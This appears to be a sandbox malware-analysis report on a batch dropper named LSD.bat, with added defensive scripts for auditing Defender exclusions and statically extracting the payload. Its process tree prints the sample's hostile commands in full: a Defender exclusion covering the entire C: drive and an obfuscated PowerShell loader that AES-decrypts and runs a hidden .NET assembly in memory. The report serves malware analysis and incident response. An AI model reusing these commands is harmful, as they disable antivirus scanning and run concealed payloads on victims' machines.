Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags
    arch:x64 arch:x86 image:win7-20240705-en locale:en-us os:windows7-x64 system
  • submitted
    25/08/2024, 17:21

General

  • Target

    LSD.bat

  • Size

    1.3MB

  • MD5

    a9550f1c944a4bce9df986467e8c8065

  • SHA1

    da6c3d1e0b74a372f36b757917f0e9ddbd9ef4c3

  • SHA256

    b7e0820ac8d4ca27a84814f33838a9892aaaec76f8837e791d6bad95e6259529

  • SHA512

    fa76880904d49ac990a6b1172cf4aaa71c6119c17ed8c7bf31a9922433499ba3630d554273b49467ad59678d5d348deb8d7ce55b1120b4972941609566a732ca

  • SSDEEP

    24576:IGaUv+Fjs045DPskYT2fBgr5ewKfgqVjS59G26wl9OM9g+l6xjSHWwu5:L9+yPf+VeYG2tI1QMW2z

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, or processes. Here: Add-MpPreference -ExclusionPath "C:\\" (PID 2772), which excludes the entire system drive from scanning.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
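The exclusion added at PID 2772 covers the whole system drive, so any later payload written anywhere on C: is never scanned. The following is an added example for this page, not part of the tria.ge report or of the sample: a responder's audit that lists the current Defender exclusions, removes over-broad ones (drive roots and the Temp directory where LSD.bat and LSD.bat.exe were staged), and pulls the event that timestamps the change. It assumes the Defender PowerShell module (Windows 8 / Server 2012 and later) and an elevated session; that module is not present on the Windows 7 image this report ran on, so on that platform the Add-MpPreference call errors out while still appearing as a process creation, as it does in the tree below.

```powershell
# Added example, not part of the tria.ge report: audit and reverse the
# Defender exclusion this sample adds. Needs the Defender module
# (Windows 8 / Server 2012 and later; absent on the Windows 7 image this
# report ran on) and an elevated session.
$pref = Get-MpPreference

"Path exclusions:";      $pref.ExclusionPath
"Extension exclusions:"; $pref.ExclusionExtension
"Process exclusions:";   $pref.ExclusionProcess

# Exclusions that neutralise scanning wholesale: a drive root (what this
# sample adds with -ExclusionPath "C:\"), or the user's temp directory,
# where LSD.bat and LSD.bat.exe were staged. The pattern list is this
# example's own choice.
$overBroad = @($pref.ExclusionPath | Where-Object {
    $_ -match '^[A-Za-z]:\\?$' -or $_ -like "$env:TEMP*" -or $_ -like '*\AppData\Local\Temp*'
})

foreach ($p in $overBroad) {
    "Removing over-broad exclusion: $p"
    Remove-MpPreference -ExclusionPath $p
}

# Every preference change is logged as event 5007 in Defender's
# operational log; the message quotes the old and new registry values
# under ...\Windows Defender\Exclusions, which dates the Add-MpPreference
# call for the incident timeline.
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'
    Id      = 5007
} -MaxEvents 100 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'Exclusions' } |
    Select-Object TimeCreated, Message | Format-List
```

Run it from an elevated prompt on the affected host after the sample's processes have been stopped; removing the exclusion first is pointless if the loader is still running and can simply add it back.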

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\LSD.bat"
    1⤵
    • Deletes itself
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2976
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
        PID:2184
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
      2⤵
      PID:2668
    • C:\Windows\system32\findstr.exe
      findstr /C:"" blacklist.txt
      2⤵
      PID:2760
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\\"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2772
    • C:\Users\Admin\AppData\Local\Temp\LSD.bat.exe
      "LSD.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $YZrPtiYD = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\LSD.bat').Split([Environment]::NewLine);foreach ($uDpKXGuz in $YZrPtiYD) { if ($uDpKXGuz.StartsWith(':: ')) { $TsoLQbVY = $uDpKXGuz.Substring(3); break; }; };$DLhtmrSl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($TsoLQbVY);$MmDnIeCf = New-Object System.Security.Cryptography.AesManaged;$MmDnIeCf.Mode = [System.Security.Cryptography.CipherMode]::CBC;$MmDnIeCf.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$MmDnIeCf.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UJKza9U4IyboVW3XkY78xdElsdzOf0qDcphsexgwGg=');$MmDnIeCf.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IHByTY43CTggzzH1HZVtxA==');$DUzPrnIo = $MmDnIeCf.CreateDecryptor();$DLhtmrSl = $DUzPrnIo.TransformFinalBlock($DLhtmrSl, 0, $DLhtmrSl.Length);$DUzPrnIo.Dispose();$MmDnIeCf.Dispose();$jGyEbXKQ = New-Object System.IO.MemoryStream(, $DLhtmrSl);$HlKcPZxE = New-Object System.IO.MemoryStream;$foNXcIsL = New-Object System.IO.Compression.GZipStream($jGyEbXKQ, [IO.Compression.CompressionMode]::Decompress);$foNXcIsL.CopyTo($HlKcPZxE);$foNXcIsL.Dispose();$jGyEbXKQ.Dispose();$HlKcPZxE.Dispose();$DLhtmrSl = $HlKcPZxE.ToArray();$AMliJFTS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($DLhtmrSl);$KtZnRMID = $AMliJFTS.EntryPoint;$KtZnRMID.Invoke($null, (, [string[]] ('')))
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2544
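Reading the tree from the top: cmd.exe runs "net file" (commonly used by batch droppers as an elevation check, since it fails without administrative rights), fetches the machine's public IP with "curl -s https://api.ipify.org" and greps it against a bundled blacklist.txt, adds the Defender exclusion, and finally launches LSD.bat.exe. The empty search string in findstr /C:"" blacklist.txt is consistent with the curl call producing no output: curl.exe only ships with Windows 10 1803 and later, so it is absent on this Windows 7 image unless installed separately. LSD.bat.exe is invoked with PowerShell's own switches (-noprofile -windowstyle hidden -ep bypass -command), which is consistent with a renamed copy of powershell.exe, although the report does not identify the binary. Its command line is the actual loader: it reads LSD.bat, takes the first line beginning with ":: " (a batch comment, so cmd.exe skips the ciphertext when it runs the file), base64-decodes it, decrypts it with AES-256-CBC under a hardcoded 32-byte key and 16-byte IV, gunzips the result, loads it as a .NET assembly with Assembly.Load and calls its EntryPoint. The method names are written reversed and re-joined ('txeTllAdaeR'[-1..-11] -join '' is ReadAllText, 'gnirtS46esaBmorF'[-1..-16] is FromBase64String, 'daoL'[-1..-4] is Load) and invoked through PowerShell's string-indexed member syntax, so none of the literal names appear in the command line.

The script below is an added example written for this page, not code from the sample or from tria.ge. It reproduces the loader's decode chain statically on a copy of LSD.bat and writes the decrypted assembly to disk instead of loading it, so the payload is never executed. The key and IV are the ones visible in the loader above; the parameter names, the output path and the PE signature check are this example's own.

```powershell
# Added example: static extraction of the payload embedded in LSD.bat.
# Mirrors the loader's chain (base64 -> AES-256-CBC -> gzip) with the
# same .NET classes, but ends with WriteAllBytes instead of
# [Reflection.Assembly]::Load, so nothing from the sample runs.
param(
    [Parameter(Mandatory = $true)][string]$BatPath,
    [string]$OutPath = "$BatPath.payload.bin",
    # Key (32 bytes) and IV (16 bytes) as hardcoded in the loader command line.
    [string]$KeyB64 = '3UJKza9U4IyboVW3XkY78xdElsdzOf0qDcphsexgwGg=',
    [string]$IvB64  = 'IHByTY43CTggzzH1HZVtxA=='
)

# The loader scans its own file for the first line starting with ':: '
# and treats the remainder of that line as the base64 ciphertext.
$marker = [IO.File]::ReadAllLines($BatPath) |
    Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
if (-not $marker) { throw "no ':: ' payload line found in $BatPath" }
$cipher = [Convert]::FromBase64String($marker.Substring(3))

# AES-256-CBC with PKCS7 padding, exactly as the loader configures it.
$aes = New-Object Security.Cryptography.AesManaged
$aes.Mode    = [Security.Cryptography.CipherMode]::CBC
$aes.Padding = [Security.Cryptography.PaddingMode]::PKCS7
$aes.Key = [Convert]::FromBase64String($KeyB64)
$aes.IV  = [Convert]::FromBase64String($IvB64)
$dec   = $aes.CreateDecryptor()
$plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length)
$dec.Dispose(); $aes.Dispose()

# Gzip layer: the decrypted bytes are a gzip stream wrapping the assembly.
$in  = New-Object IO.MemoryStream(, $plain)
$gz  = New-Object IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
$out = New-Object IO.MemoryStream
$gz.CopyTo($out); $gz.Dispose(); $in.Dispose()
$payload = $out.ToArray(); $out.Dispose()

# A loadable .NET assembly is a PE file, so the first two bytes should be
# 'MZ'. This is only a plausibility check before handing the file to a
# .NET decompiler; the payload is deliberately not loaded here.
$isPe = ($payload.Length -gt 0x40) -and ($payload[0] -eq 0x4D) -and ($payload[1] -eq 0x5A)
[IO.File]::WriteAllBytes($OutPath, $payload)
$sha = [BitConverter]::ToString(
    [Security.Cryptography.SHA256]::Create().ComputeHash($payload)).Replace('-', '').ToLower()
"{0} bytes written to {1} (PE header: {2}) sha256={3}" -f $payload.Length, $OutPath, $isPe, $sha
```

Run it as .\extract.ps1 -BatPath .\LSD.bat on an isolated analysis box; the only file it touches is the output path. If the key or IV in a variant differs, pass -KeyB64 / -IvB64 with the values taken from that variant's command line, since the decrypt will otherwise fail with a padding error.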

Network

MITRE ATT&CK Enterprise v15

Downloads

  • \Users\Admin\AppData\Local\Temp\LSD.bat.exe

    Filesize

    462KB

    MD5

    852d67a27e454bd389fa7f02a8cbe23f

    SHA1

    5330fedad485e0e4c23b2abe1075a1f984fde9fc

    SHA256

    a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

    SHA512

    327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

  • memory/2544-15-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

    Filesize

    2.9MB

  • memory/2544-16-0x0000000001CB0000-0x0000000001CB8000-memory.dmp

    Filesize

    32KB

  • memory/2772-4-0x000007FEF618E000-0x000007FEF618F000-memory.dmp

    Filesize

    4KB

  • memory/2772-5-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

    Filesize

    2.9MB

  • memory/2772-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

    Filesize

    32KB

  • memory/2772-8-0x0000000002E3B000-0x0000000002EA2000-memory.dmp

    Filesize

    412KB

  • memory/2772-7-0x0000000002E34000-0x0000000002E37000-memory.dmp

    Filesize

    12KB

  • memory/2772-9-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp

    Filesize

    9.6MB

  • memory/2772-17-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp

    Filesize

    9.6MB